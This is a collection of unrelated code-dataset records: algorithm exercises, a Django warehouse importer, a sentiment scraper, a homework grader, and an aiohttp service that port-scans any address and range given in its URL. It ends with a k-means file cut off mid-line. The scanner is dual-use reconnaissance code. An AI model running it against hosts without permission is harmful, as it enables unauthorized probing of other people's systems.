cms.InputTag(\"TriggerResults\", \"\", \"HLT\"),\n triggerSummary = cms.InputTag(\"hltTriggerSummaryAOD\", \"\", \"HLT\"),\n AlgInputTag = cms.InputTag( \"gtStage2Digis\" )\n\n)\n\n\n\n\nprocess.TriggerTree = cms.Path(process.ThreeMuonSelSeq*\n process.TreeMakerBkg\n )\n\n\n\n\n\n","sub_path":"SkimTools/SkimTrigger/test/run_TriggerTreeMaker_MC_cfg.py","file_name":"run_TriggerTreeMaker_MC_cfg.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"329757954","text":"def nextGreaterElement(nums1, nums2):\n\n # result = []\n\n # for num in nums1:\n # index = nums2.index(num)\n # large = -1\n # for i in range(index + 1, len(nums2)):\n # if nums2[i] > num:\n # large = nums2[i]\n # break\n # result.append(large)\n \n # return result\n\n cache, stack = {}, []\n result = []\n\n for num in nums2:\n if len(stack) == 0:\n stack.append(num)\n elif stack[-1] >= num:\n stack.append(num)\n elif stack[-1] < num:\n while stack and stack[-1] < num:\n cache[stack.pop()] = num\n stack.append(num)\n \n for num in nums1:\n if num in cache:\n result.append(cache[num])\n else:\n result.append(-1)\n \n return result\n\n\nnums1 = [4,1,2]\nnums2 = [1,3,4,2]\nprint(nextGreaterElement(nums1, nums2))\n\n\n\"\"\"\ndef nextGreaterElement(self, findNums, nums):\n\n :type findNums: List[int]\n :type nums: List[int]\n :rtype: List[int]\n\n cache, st = {}, []\n for x in nums:\n if len(st) == 0:\n st.append(x)\n elif x <= st[-1]:\n st.append(x)\n else:\n while st and st[-1] < x:\n cache[st.pop()] = x\n st.append(x)\n result = []\n for x in findNums:\n if x in cache:\n result.append(cache[x])\n else:\n result.append(-1)\n return result\n\n\n\n\"\"\"","sub_path":"Stacks/LeetCode/NextGreaterElementI_496.py","file_name":"NextGreaterElementI_496.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"644247857","text":"# Minus the old existing functions,\n# this contains only functions that will directly affect warehouse data.\n\nimport xlrd\nfrom io import BytesIO\nfrom django.core.files.base import ContentFile\nimport uuid\n\nfrom .models import Location, DataDate, Items, DataDate, \\\n make_location\n\nimport re, datetime, time, pytz\nfrom django.utils.timezone import activate\nfrom django.conf import settings\nfrom django import db\n\nfrom django.utils.translation import gettext\n# Used: process_excel_file\n\ndef process_excel_file(file):\n\n print(datetime.datetime.now())\n activate(settings.TIME_ZONE)\n filename = file.name\n\n file_regex = re.compile('(?P\\d\\d\\d\\d)(?P\\d\\d)'\n + '(?P\\d\\d)(?P\\d\\d)'\n + '(?P\\d\\d)(?P\\d\\d)')\n re_result = re.match(file_regex, filename)\n\n year = int(re_result.group(\"year\"))\n month = int(re_result.group(\"month\"))\n day = int(re_result.group(\"day\"))\n hour = int(re_result.group(\"hour\"))\n min = int(re_result.group(\"min\"))\n sec = int(re_result.group(\"sec\"))\n\n d = datetime.datetime(year=year,month=month,day=day,hour=hour,minute=min,second=sec)\n data_date_query = DataDate.objects.filter(date=d)\n if len(data_date_query) > 0:\n d_time_str = d.strftime('%m/%d/%Y %I:%M %p')\n m_1 = gettext(\"Excel file with date \")\n m_2 = gettext(\" has uploaded already.\")\n return m_1 + d_time_str + m_2\n\n data = file.read()\n workbook = xlrd.open_workbook(file_contents=data)\n worksheet = workbook.sheet_by_index(0)\n\n data_date = DataDate(date=d)\n data_date.save()\n\n def convert_lab_id(id_string):\n return int(float(id_string))\n\n def convert_item_code(item_code):\n \"\"\"\n xlrd (or excel) reads integers as floats (thus this converts any potential floats\n that should be an int for the item code into an item before converting it into a\n string.\n \"\"\"\n item_type = type(item_code)\n if item_type == float and int(item_code) == item_code:\n return str(int(item_code))\n else:\n return str(item_code)\n\n def get_date_from_xlrd(date_string):\n if date_string == \"\":\n return None\n # d = xlrd.xldate.xldate_as_datetime(date_string, workbook.datemode)\n timezone = pytz.timezone('Asia/Hong_Kong')\n print(date_string)\n year, month, day, hour, minute, second = xlrd.xldate_as_tuple(date_string, workbook.datemode)\n d = datetime.datetime(year, month, day, hour, minute, second, tzinfo=timezone)\n return d\n\n def cut_description_length(desc):\n return str(desc)[:100]\n\n column_map = {\n # Name has to mach Items model values\n (0, \"item_id\", int,),\n (2, \"location_code\", str,),\n (6, \"lab_id\", convert_lab_id,),\n (9, \"fifo_date\", get_date_from_xlrd,),\n (18, \"iv_create_date\", get_date_from_xlrd),\n (13, \"rcv\", str,),\n (27, \"item_code\", convert_item_code,),\n (28, \"ship_quantity\", int,),\n (31, \"item_weight\", float,),\n (36, \"last_out_date\", get_date_from_xlrd,),\n (39, \"description\", cut_description_length,),\n (33, \"customer_code\", int,),\n (42, \"avail_quantity\", int,),\n }\n\n location_dict = {}\n\n loc_regex = re.compile(\n '(?P.+)\\.(?P.+)\\.(?P[a-zA-Z]*)(?P\\d+)\\.(?P.+)\\.(?P.+)')\n\n\n items_list = []\n for row in range(1, worksheet.nrows):\n # for row in range(1, 1000):\n\n item_data = {}\n\n # for key, col in item_map.items():\n for column_tup in column_map:\n column = column_tup[0]\n key = column_tup[1]\n modifier = column_tup[2]\n\n v = worksheet.cell_value(row,column)\n\n item_data[key] = modifier(v)\n\n # Add item data dictionary to location_dict\n location_code = 
item_data[\"location_code\"]\n\n # Add item_data dictionary to item_dict\n item_code = item_data[\"item_code\"]\n\n if location_code in location_dict:\n location_inst = location_dict[location_code]\n else:\n r = re.match(loc_regex, location_code)\n\n warehouse_location = r.group(\"warehouse_location\")\n area = r.group(\"area\")\n aisle_letter = r.group(\"aisle_letter\")\n aisle_num = int(r.group(\"aisle_num\"))\n column = int(r.group(\"column\"))\n level = int(r.group(\"level\"))\n\n # Account for human error input of items into WMS\n if area == 'F' and aisle_letter == '' and level == 1:\n aisle_letter = 'F'\n\n try:\n location_inst = Location.objects.get(warehouse_location=warehouse_location,\n area=area,\n aisle_letter=aisle_letter,\n aisle_num=aisle_num,\n column=column,\n level=level,\n )\n except Location.DoesNotExist:\n location_inst = make_location(warehouse_location=warehouse_location,\n area=area,\n aisle_letter=aisle_letter,\n aisle_num=aisle_num,\n column=column,\n level=level,\n )\n\n location_dict[location_code] = location_inst\n\n i = Items(rack_location=location_inst,\n data_date=data_date,\n **item_data\n )\n items_list.append(i)\n it = Items.objects.bulk_create(items_list, batch_size=2000)\n # db.reset_queries()\n print(datetime.datetime.now())\n return 0\n\ndef delete_all_rack_location():\n Location.objects.all().delete()\n\ndef reset_db(delete_rack = False):\n DataDate.objects.all().delete()\n\n Items.objects.all().delete()\n\n if delete_rack:\n delete_all_rack_location()\n # populate_rack_location()\n\ndef get_datadates(num_dates=0):\n dates = DataDate.objects.order_by('-date')\n if num_dates != 0:\n dates = dates[:num_dates]\n return dates\n\ndef get_info():\n # unknown_location = Location.objects.get(loc=\"Unknown\")\n start = time.time()\n datadate = DataDate.objects.all().order_by('-date')[0]\n # items_query = datadate.items_set.all()\n items_query = Items.objects.filter(data_date=datadate)\n\n count = 0\n item_count = 0\n for i in items_query:\n count += 1\n item_count += i.avail_quantity\n\n print(count)\n print(time.time() - start)\n return item_count\n\ndef get_data_map(location_map, data_type):\n return []\n\ndef get_item_count_map(loc, date_id, level):\n data_dic = {}\n data_date_inst = DataDate.objects.get(pk = date_id)\n\n i_q = Items.objects.filter(data_date=data_date_inst, rack_location__loc=loc)\n if level != \"All\":\n i_q = i_q.filter(rack_location__level=level)\n i_q = i_q.select_related('rack_location')\n\n for item_inst in i_q:\n js_loc_code = loc_inst_to_jsloccode(item_inst.rack_location)\n if js_loc_code not in data_dic:\n data_dic[js_loc_code] = {\"items\": {}, \"total\": 0}\n\n location = item_inst.location_code\n if location not in data_dic[js_loc_code][\"items\"]:\n data_dic[js_loc_code][\"items\"][location] = {}\n cur_item_dic = data_dic[js_loc_code][\"items\"][location]\n\n item_code = item_inst.item_code\n item_quantity = item_inst.avail_quantity + item_inst.ship_quantity\n data_dic[js_loc_code][\"total\"] += item_quantity\n\n if item_code not in cur_item_dic:\n cur_item_dic[item_code] = item_quantity\n else:\n cur_item_dic[item_code] += item_quantity\n\n return data_dic\n\ndef get_item_shipped_map(loc, date_1_id, date_2_id, level):\n \"\"\"\n Returns dictionary map of items_shipped\n :param loc: String letter\n :param date_1_id: Int of datadate ID\n :param date_2_id: Int of datadate ID\n :param level: Int ( or \"All\") of level to search\n :return: {\"items\": {[\"location code\"]: {item_sku[Int]: [Int # item shipped]} }, \"total\": 0}\n 
\"\"\"\n data_dic = {}\n\n datadate_1 = DataDate.objects.get(pk = date_1_id)\n datadate_2 = DataDate.objects.get(pk = date_2_id)\n d_1 = datadate_1.date\n d_2 = datadate_2.date\n\n # Check whether date_1 or date_2 is older.\n if d_1 == d_2:\n return {}\n if d_1 > d_2:\n newer_datadate = datadate_1\n older_datadate = datadate_2\n else:\n newer_datadate = datadate_2\n older_datadate = datadate_1\n\n item_query_older = Items.objects.filter(data_date=older_datadate, rack_location__loc=loc)\n item_query_newer = Items.objects.filter(data_date=newer_datadate, fifo_date__lte=older_datadate.date).select_related('rack_location')\n\n if level != \"All\":\n item_query_older = item_query_older.filter(rack_location__level=level)\n item_query_older = item_query_older.select_related('rack_location')\n\n labId_newerItem_dic = {}\n labId_olderItem_dic = {}\n labId_older_iteminst_dic = {}\n for item_1 in item_query_newer:\n lid = item_1.lab_id\n if lid in labId_newerItem_dic:\n labId_newerItem_dic[lid] += item_1.avail_quantity + item_1.ship_quantity\n else:\n labId_newerItem_dic[lid] = item_1.avail_quantity + item_1.ship_quantity\n for item_2 in item_query_older:\n lid = item_2.lab_id\n if lid in labId_olderItem_dic:\n labId_olderItem_dic[lid] += item_2.avail_quantity + item_2.ship_quantity\n else:\n labId_olderItem_dic[lid] = item_2.avail_quantity + item_2.ship_quantity\n # New items in excel are read first, so older items will replace older\n # ones in lab_id_loc_dic. Because older items should go first\n # (It's actually by RCV date).\n\n labId_older_iteminst_dic[lid] = item_2\n\n for lab_id in labId_olderItem_dic:\n item_inst = labId_older_iteminst_dic[lab_id]\n\n js_loc_code = loc_inst_to_jsloccode(item_inst.rack_location)\n\n item_code = item_inst.item_code\n item_quantity = labId_olderItem_dic[lab_id]\n\n if lab_id in labId_newerItem_dic:\n difference = item_quantity - labId_newerItem_dic[lab_id]\n else:\n difference = item_quantity\n if difference == 0:\n continue\n elif difference < 0:\n item_q = Items.objects.filter(data_date=older_datadate, lab_id=lab_id)\n total = 0\n for i in item_q:\n total += i.avail_quantity + i.ship_quantity\n difference = total - labId_newerItem_dic[lab_id]\n if difference == 0:\n continue\n\n if js_loc_code not in data_dic:\n data_dic[js_loc_code] = {\"items\": {}, \"total\": 0}\n\n location = item_inst.location_code\n if location not in data_dic[js_loc_code][\"items\"]:\n data_dic[js_loc_code][\"items\"][location] = {}\n cur_item_dic = data_dic[js_loc_code][\"items\"][location]\n\n data_dic[js_loc_code][\"total\"] += difference\n\n if item_code not in cur_item_dic:\n cur_item_dic[item_code] = difference\n else:\n cur_item_dic[item_code] += difference\n\n return data_dic\n\ndef get_item_added_map(loc, date_1_id, time_period, level):\n data_dic = {}\n\n datadate = DataDate.objects.get(pk=date_1_id)\n submitted_date = datadate.date\n\n t_delta = datetime.timedelta(days=int(time_period))\n\n prev_date = submitted_date - t_delta\n\n # iv_create_date is usually the the newest date, with it being sometimes nearly the same\n # as fifo_date.\n item_query = Items.objects.filter(data_date=datadate, rack_location__loc=loc, iv_create_date__gte=prev_date)\n\n if level != \"All\":\n item_query = item_query.filter(rack_location__level=level)\n item_query = item_query.select_related('rack_location')\n\n for item in item_query:\n if item.get_input_date() < prev_date:\n continue\n\n js_loc_code = loc_inst_to_jsloccode(item.rack_location)\n\n item_code = item.item_code\n item_quantity = 
item.avail_quantity + item.ship_quantity\n\n if js_loc_code not in data_dic:\n data_dic[js_loc_code] = {\"items\": {}, \"total\": 0}\n\n location = item.location_code\n if location not in data_dic[js_loc_code][\"items\"]:\n data_dic[js_loc_code][\"items\"][location] = {}\n cur_item_dic = data_dic[js_loc_code][\"items\"][location]\n\n data_dic[js_loc_code][\"total\"] += item_quantity\n\n if item_code not in cur_item_dic:\n cur_item_dic[item_code] = item_quantity\n else:\n cur_item_dic[item_code] += item_quantity\n\n return data_dic\n\ndef loc_inst_to_jsloccode(loc_inst):\n # Returns the loc_code used in js component\n # (Location code, without the level implemented).\n warehouse_code = \"USLA\"\n area_code = \"\"\n aisle_code = str(loc_inst.aisle_num)\n column_code = str(loc_inst.column)\n\n loc = loc_inst.loc\n area = loc_inst.area\n aisle_letter = loc_inst.aisle_letter\n if loc == \"P\":\n area_code = \"P\"\n elif loc == \"S\":\n if area == \"H\" and aisle_letter == \"H\" or area == \"S\":\n area_code = \"S\"\n else:\n area_code = \"H\"\n elif loc == \"VC\":\n if area == \"VC\" or area == \"VD\":\n area_code = \"VC\"\n elif area == \"VA\" or area == \"VB\":\n area_code = \"VA\"\n else:\n area_code = \"H\"\n else:\n if area == \"F\":\n area_code = \"F\"\n else:\n area_code = \"VA\"\n return warehouse_code + \".\" + area_code + \".\" + aisle_code + \".\" + column_code\n\ndef delete_by_date(date_id):\n data_date = DataDate.objects.get(id=date_id)\n data_date.delete()\n # It cascades to Items by foreign key association\n return data_date","sub_path":"warehouse_data/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":14147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"308209548","text":"import sys\nimport requests\nfrom bs4 import BeautifulSoup\nfrom polyglot.text import Text\n\n#Run once\n#import nltk\n#nltk.download('stopwords')\n\nfrom nltk.corpus import stopwords #to get russian stopwords\nfrom pymystem3 import Mystem #for lemmatization\nfrom string import punctuation\n\n''' \nSource of the solution to tokenize:\nhttps://www.kaggle.com/alxmamaev/how-to-easy-preprocess-russian-text\n'''\n\n#Create lemmatizer and stopwords list\nmystem = Mystem() \nrussian_stopwords = stopwords.words(\"russian\")\n\n#Preprocess function\ndef preprocess_text(text):\n tokens = mystem.lemmatize(text.lower())\n tokens = [token for token in tokens if token not in russian_stopwords\\\n and token != \" \" \\\n and token.strip() not in punctuation]\n \n text = \" \".join(tokens)\n \n return text\n\n# Get the data by URL\nurl = sys.argv[1]\npage = requests.get(url)\n\n#Check received data\nif page.status_code != 200:\n\traise NameError('Unexpected status code is received')\nelse:\n\tsoup = BeautifulSoup(page.text, 'html.parser')\n\ntitle = soup.find(\"title\")\nlines = soup.find_all(\"p\")\nbody = '\\n'.join([line.text.strip() for line in lines])\n\ntext = Text(preprocess_text(body))\n\nvsum = 0\nfor w in text.words:\n vsum = vsum + w.polarity\n\nprint('Сумма полярностей: '+str(vsum))\n\nif vsum >= 0:\n print(\"Статью можно считать позитивной!\")\nelse:\n print(\"Статью можно считать негативной!\")\n\n# Если нужно посмотреть таблицу Слово-Полярность\n'''\nprint(\"{:<16}{}\".format(\"Word\", \"Polarity\")+\"\\n\"+\"-\"*30)\nfor w in text.words:\n print(\"{:<16}{:>2}\".format(w, w.polarity))\n'''","sub_path":"webscraper.py","file_name":"webscraper.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"174435743","text":"import os\nimport numpy as np\n\nprint('\\n======================= Code Execution =======================\\n')\n\nif False:\n runningInNotebook = False\n print('========================RUNNING INSTRUCTOR''S SOLUTION!')\n import A1mysolution as useThisCode\n train = useThisCode.train\n trainSGD = useThisCode.trainSGD\n use = useThisCode.use\n rmse = useThisCode.rmse\n\nelse:\n print('Extracting python code from notebook and storing in notebookcode.py')\n import subprocess\n with open('notebookcode.py', 'w') as outputFile:\n subprocess.call(['jupyter', 'nbconvert', '--to', 'script',\n '*-A1.ipynb', '--stdout'], stdout=outputFile)\n # from https://stackoverflow.com/questions/30133278/import-only-functions-from-a-python-file\n import sys\n import ast\n import types\n with open('notebookcode.py') as fp:\n tree = ast.parse(fp.read(), 'eval')\n print('Removing all statements that are not function or class defs or import statements.')\n for node in tree.body[:]:\n if (not isinstance(node, ast.FunctionDef) and\n not isinstance(node, ast.ClassDef) and\n not isinstance(node, ast.Import) and\n not isinstance(node, ast.ImportFrom)):\n tree.body.remove(node)\n # Now write remaining code to py file and import it\n module = types.ModuleType('notebookcodeStripped')\n code = compile(tree, 'notebookcodeStripped.py', 'exec')\n sys.modules['notebookcodeStripped'] = module\n exec(code, module.__dict__)\n # import notebookcodeStripped as useThisCode\n from notebookcodeStripped import *\n\ndef close(a, b, within=0.01):\n return abs(a-b) < within\n\ng = 0\n\nA = np.array([[1,2,3], [4,5,6]])\nB = A + 1\nprint('Testing rmse(A, B) with\\n A =\\n{}\\n and B =\\n{}'.format(A, B))\n\ntry:\n answer = rmse(A, B)\n correctAnswer = 1\n if close(answer, correctAnswer):\n g += 10\n print('\\n--- 10/10 points. Correctly returned {}'.format(answer))\n else:\n print('\\n--- 0/10 points. Incorrect. You returned {}, but correct answer is {}'.format(answer, correctAnswer))\nexcept Exception as ex:\n print('\\n--- 0/10 points. rmse raised the exception\\n {}'.format(ex))\n\n\nX = np.arange(15).reshape((5,3))\nX[3:5, :] *= 2\nT = X[:,0:2] + 0.1 * X[:,1:2] * X[:,2:3]\n\nprint('\\nTesting model = train(X, T) with\\n X=\\n{}\\n and T=\\n{}'.format(X, T))\ntry:\n model = train(X, T)\n if 'means' in model.keys():\n g += 5\n print('\\n--- 5/5 points. Model correctly includes a key named \\'means\\'.')\n else:\n print('\\n--- 0/5 points. Model does not include a key named \\'means\\'.')\n \n if 'stds' in model.keys():\n g += 5\n print('\\n--- 5/5 points. Model correctly includes a key named \\'stds\\'.')\n else:\n print('\\n--- 0/5 points. Model does not include a key named \\'stds\\'.')\n \n if 'w' in model.keys():\n g += 5\n print('\\n--- 5/5 points. Model correctly includes a key named \\'w\\'.')\n else:\n print('\\n--- 0/5 points. Model does not include a key named \\'w\\'.')\n\nexcept Exception as ex:\n print('\\n--- 0/15 points. train raised the exception\\n {}'.format(ex))\n\nprint('\\nTesting rmse(T, use(model, X))')\ntry:\n answer = rmse(T, use(model, X))\n correctAnswer = 5.24\n if close(answer, correctAnswer, 0.2):\n g += 15\n print('\\n--- 15/15 points. Error is correctly calculated as {}.'.format(answer))\n else:\n print('\\n--- 0/15 points. Error of {} is wrong. It should be {}.'.format(answer, correctAnswer))\n\nexcept Exception as ex:\n print('\\n--- 0/15 points. 
rmse or use raised the exception\\n {}'.format(ex))\n\n\n\nprint('\\nTesting model = trainSGD(X, T, 0.01, 1000) with\\n X=\\n{}\\n and T=\\n{}'.format(X, T))\ntry:\n model = trainSGD(X, T, 0.01, 1000)\n if 'means' in model.keys():\n g += 5\n print('\\n--- 5/5 points. Model correctly includes a key named \\'means\\'.')\n else:\n print('\\n--- 0/5 points. Model does not include a key named \\'means\\'.')\n \n if 'stds' in model.keys():\n g += 5\n print('\\n--- 5/5 points. Model correctly includes a key named \\'stds\\'.')\n else:\n print('\\n--- 0/5 points. Model does not include a key named \\'stds\\'.')\n \n if 'w' in model.keys():\n g += 5\n print('\\n--- 5/5 points. Model correctly includes a key named \\'w\\'.')\n else:\n print('\\n--- 0/5 points. Model does not include a key named \\'w\\'.')\n\nexcept Exception as ex:\n print('\\n--- 0/15 points. trainSGD raised the exception\\n {}'.format(ex))\n\nprint('\\nTesting rmse(T, use(model, X))')\ntry:\n answer = rmse(T, use(model, X))\n correctAnswer = 5.24\n if close(answer, correctAnswer):\n g += 15\n print('\\n--- 15/15 points. Error is correctly calculated as {}.'.format(answer))\n else:\n print('\\n--- 0/15 points. Error of {} is wrong. It should be {}.'.format(answer, correctAnswer))\n\nexcept Exception as ex:\n print('\\n--- 0/15 points. rmse or use raised the exception\\n {}'.format(ex))\n\n\nname = os.getcwd().split('/')[-1]\n\nprint('\\n{} Execution Grade is {}/70'.format(name, g))\n\nprint('\\n======================= Plots and Descriptions =======================')\n\nprint('\\n--- _/5 points. Descriptions of data, including plots.')\n\nprint('\\n--- _/5 points. Descriptions of algorithms for fitting linear model.')\n\nprint('\\n--- _/5 points. Descriptions of code for all defined functions.')\n\nprint('\\n--- _/5 points. Plots of predictions made by models from train and trainSGD. Must at least include predicted values versus actual values for each target variable and for each model.')\n\nprint('\\n--- _/5 points. Discussions of the above plots of predictions and actual values.')\n\nprint('\\n--- _/5 points. Discussion of accuracy of each model. Refer to RMSE values and what they mean with respect to the range of target values.')\n\n\n\nprint('\\n{} Notebook Grade is __/30'.format(name))\n\nprint('\\n{} FINAL GRADE is __/100'.format(name))\n\n\n\n","sub_path":"A1/A1grader.py","file_name":"A1grader.py","file_ext":"py","file_size_in_byte":5969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
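The grader above imports train, trainSGD, use and rmse from the student's notebook. A minimal sketch of that expected interface (only rmse is implemented here, and it reproduces the grader's first check, rmse(A, A + 1) == 1; the rest are placeholders, not the assignment solution):

    import numpy as np

    def rmse(A, B):
        # root-mean-squared error between two arrays
        return np.sqrt(np.mean((np.asarray(A) - np.asarray(B)) ** 2))

    def train(X, T):
        # must return a dict with at least the keys 'means', 'stds' and 'w'
        raise NotImplementedError

    def trainSGD(X, T, learning_rate, n_iterations):
        # same contract as train, fit by stochastic gradient descent
        raise NotImplementedError

    def use(model, X):
        # must return predictions comparable to T via rmse
        raise NotImplementedError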
+{"seq_id":"394831568","text":"#!/usr/bin/python3\nimport asyncio\nimport socket\nimport logging\nimport aiodns\nimport resource\nfrom aiohttp import web\nfrom logging.handlers import SysLogHandler\nfrom request_checkers import (is_valid_tcp_upd_port,\n is_valid_ipv4_address,\n is_valid_ipv6_address)\n\n\nasync def handle_error(msg):\n logging.error('port_scanner_srv: ' + msg)\n raise web.HTTPBadRequest(reason=msg)\n\n\nasync def scan_port(event_loop, address, port):\n connect = asyncio.open_connection(address, port, loop=event_loop)\n try:\n await asyncio.wait_for(connect, timeout=10, loop=event_loop)\n except (asyncio.TimeoutError, ConnectionRefusedError):\n result = '{\"port\": ' + str(port) + ', \"state\": \"close\"}'\n except socket.error as msg:\n await handle_error('socket.error ' + str(msg))\n else:\n result = '{\"port\": ' + str(port) + ', \"state\": \"open\"}'\n finally:\n connect.close()\n return result\n\n\nasync def check_ports(start_port, end_port):\n if not start_port.isdecimal() or not end_port.isdecimal():\n await handle_error('The start port or end port is not a number.')\n start_port, end_port = int(start_port), int(end_port)\n if not is_valid_tcp_upd_port(start_port):\n await handle_error('The start port is out of range.')\n if not is_valid_tcp_upd_port(end_port):\n await handle_error('The end port is out of range.')\n if start_port > end_port:\n await handle_error('The start port is larger than the end port.')\n\n\nasync def resolve_and_check_address(event_loop, address):\n if is_valid_ipv4_address(address) or is_valid_ipv6_address(address):\n return address\n resolver = aiodns.DNSResolver(loop=event_loop)\n try:\n resolved_result = await resolver.gethostbyname(address, socket.AF_INET)\n except aiodns.error.DNSError as msg:\n await handle_error('The address or hostname is wrong. 
' + str(msg))\n else:\n return resolved_result.addresses[0]\n\n\nasync def increase_open_file_limit():\n max_ports_x3 = (65535 + 1) * 3\n soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)\n if max_ports_x3 > soft:\n if max_ports_x3 * 3 < hard:\n resource.setrlimit(resource.RLIMIT_NOFILE, (max_ports_x3, hard))\n\n\nasync def get_handler(request):\n event_loop = asyncio.get_event_loop()\n # Debug environment\n # event_loop.set_debug(True)\n # End debug environment\n address = await resolve_and_check_address(event_loop,\n request.match_info.get('address'))\n start_port = request.match_info.get('start_port')\n end_port = request.match_info.get('end_port')\n await check_ports(start_port, end_port)\n await increase_open_file_limit()\n response = web.StreamResponse()\n response.enable_chunked_encoding()\n response.headers['Content-Type'] = 'application/json'\n futures = [scan_port(event_loop, address, port)\n for port in range(int(start_port), int(end_port) + 1)]\n first_element = True\n for future in asyncio.as_completed(futures):\n result = await future\n if first_element:\n await response.prepare(request)\n await response.write(bytes('[' + result, encoding='utf8'))\n first_element = False\n else:\n await response.write(bytes(',' + result, encoding='utf8'))\n await response.write(bytes(']', encoding='utf-8'))\n await response.write_eof()\n return response\n\ndef main():\n app = web.Application()\n app.router.add_get('/{address}/{start_port}/{end_port}', get_handler)\n # Debug environment\n # logging.basicConfig(level=logging.DEBUG)\n # End debug environment\n logging.basicConfig(level=logging.INFO, handlers=[SysLogHandler(address='/dev/log'), SysLogHandler()])\n logging.info('port_scanner_srv: start')\n web.run_app(app, access_log_format='port_scanner_srv: %a %t \"%r\" %s %b'\n ' \"%{Referer}i\" \"%{User-Agent}i\"')\n logging.info('port_scanner_srv: stop')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ideco/task2/port_scanner_srv.py","file_name":"port_scanner_srv.py","file_ext":"py","file_size_in_byte":4084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
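Once the service is running, each scanned port is streamed back as one JSON object; a hypothetical request against the route registered above (host and port range illustrative; aiohttp's web.run_app listens on port 8080 by default):

    $ curl http://localhost:8080/127.0.0.1/79/81
    [{"port": 80, "state": "open"},{"port": 79, "state": "close"},{"port": 81, "state": "close"}]

Note the objects arrive in completion order rather than port order, because the handler iterates with asyncio.as_completed.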
+{"seq_id":"435166545","text":"\"\"\"\n\n124. Binary Tree Maximum Path Sum\n\nGiven a non-empty binary tree, find the maximum path sum.\n\nFor this problem, a path is defined as any sequence of nodes from some starting node to any node in the tree along\nthe parent-child connections. The path must contain at least one node and does not need to go through the root.\n\nExample 1:\n\nInput: [1,2,3]\n\n 1\n / \\\n 2 3\n\nOutput: 6\nExample 2:\n\nInput: [-10,9,20,null,null,15,7]\n\n -10\n / \\\n 9 20\n / \\\n 15 7\n\nOutput: 42\n\n\n\"\"\"\n\nfrom Algo.utilities.tree import *\n\n\nclass Solution:\n def maxPathSum(self, root: TreeNode) -> int:\n self.maxi = root.val\n\n def dfs(node):\n if node is None:\n return 0\n l = dfs(node.left)\n r = dfs(node.right)\n m = max(l, 0) + node.val + max(r, 0)\n self.maxi = max(m, self.maxi)\n ret = max(node.val + l, node.val + r, node.val)\n return ret\n dfs(root)\n return self.maxi\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n method = sol.maxPathSum\n\n tree1 = deserialize('[1,2,3]')\n tree2 = deserialize('[-10,9,20,null,null,15,7]')\n tree3 = deserialize('[-2,null,-3]')\n tree4 = deserialize('[1,-2,-3,1,3,-2,null,-1]')\n tree5 = deserialize('[5,4,8,11,null,13,4,7,2,null,null,null,1]')\n tree6 = deserialize('[-2,-1,-3]')\n\n cases = [\n (method, (tree1, ), 6),\n (method, (tree2, ), 42),\n (method, (tree3, ), -2),\n (method, (tree4, ), 3),\n (method, (tree5, ), 48),\n (method, (tree6, ), -1),\n ]\n\n for i, (func, case, expected) in enumerate(cases):\n ans = func(*case)\n if ans == expected:\n print(\"Case {:d} Passed\".format(i + 1))\n else:\n print(\"Case {:d} Failed; Expected {:s} != {:s}\".format(i + 1, str(expected), str(ans)))","sub_path":"algo/tree/binary_tree_maximum_path_sum.py","file_name":"binary_tree_maximum_path_sum.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"47383310","text":"\r\ndef init_global():\r\n\tglobal error\r\n\tglobal no_blocks\r\n\tglobal blocks\r\n\tglobal condition_symbols\r\n\tglobal output_list\r\n\tglobal output_to_file\r\n\tglobal block_output\r\n\r\n\tno_blocks = 0\r\n\terror = 0\r\n\tblocks = {}\r\n\tcondition_symbols = [\"==\", \"<=\", \"<\", \">=\", \">\", \"!=\", \"&&\", \"||\", \"-\", \"+\", \"/\", \"*\"]\r\n\toutput_to_file = \"\"\r\n\tblock_output = \"\"\r\n\r\n","sub_path":"Submission3/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"314036902","text":"\"\"\"\nThis python file implements the following function:\nimplements kmeans clustering utils for the project\nnormal(): Apply z-score normalization to three features in 'product_features.csv'\ndis(): calculate Euclidean distance between two vectors\nrandCent(): create k center randomly\nkMeans(): Apply K-means clustering to all products(1000) based on 'attribute1','attribute2' and 'original price'\nclu_plot(): Plot the clustering result\nsave_cate_data(): save data into different category folders based on the clustering result\nclustering(): combine the above functions and form an executable function\n\"\"\"\nimport numpy as np\nimport pandas as pd\nfrom math import *\nimport random\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom set_path import save_path\n\nc_num = 3 # number of classes\n\n\ndef normal(d_in):\n \"\"\"\n this function implements the following function:\n normalization process for different attributes (z-score)\n :param d_in: input data [[x11,x12,...],...,[xn1,xn2,...]]\n :return:d_out: normalized data\n \"\"\"\n d_out = np.empty(shape=(d_in.shape[0], 0))\n for i in range(d_in.shape[1]):\n temp = np.reshape(d_in[:, i], (-1, 1))\n mean = np.mean(temp)\n std = np.std(temp)\n temp = (temp - mean) / std\n d_out = np.hstack((d_out, temp))\n return d_out\n\n\ndef dist(A, B, w):\n \"\"\"\n this function implements the following function:\n calculate euclidean distance between A and B\n :param A: vector A\n :param B: vector B\n :param w: weight vector\n :return: dis (float)\n \"\"\"\n return np.sqrt(sum(np.power(w * (A - B), 2)))\n\n\ndef randCent(d_in, k):\n \"\"\"\n this function implements the following function:\n create k center randomly\n :param d_in: input data\n :param k: clustering number\n :return: centroids [[c11,...,c1n],...,[ck1,...,ckn]]\n \"\"\"\n d_in = np.array(d_in, dtype=np.float)\n centroids = np.empty(shape=(0, d_in.shape[1]), dtype=np.float)\n record = np.array([])\n for i in range(k):\n flag = 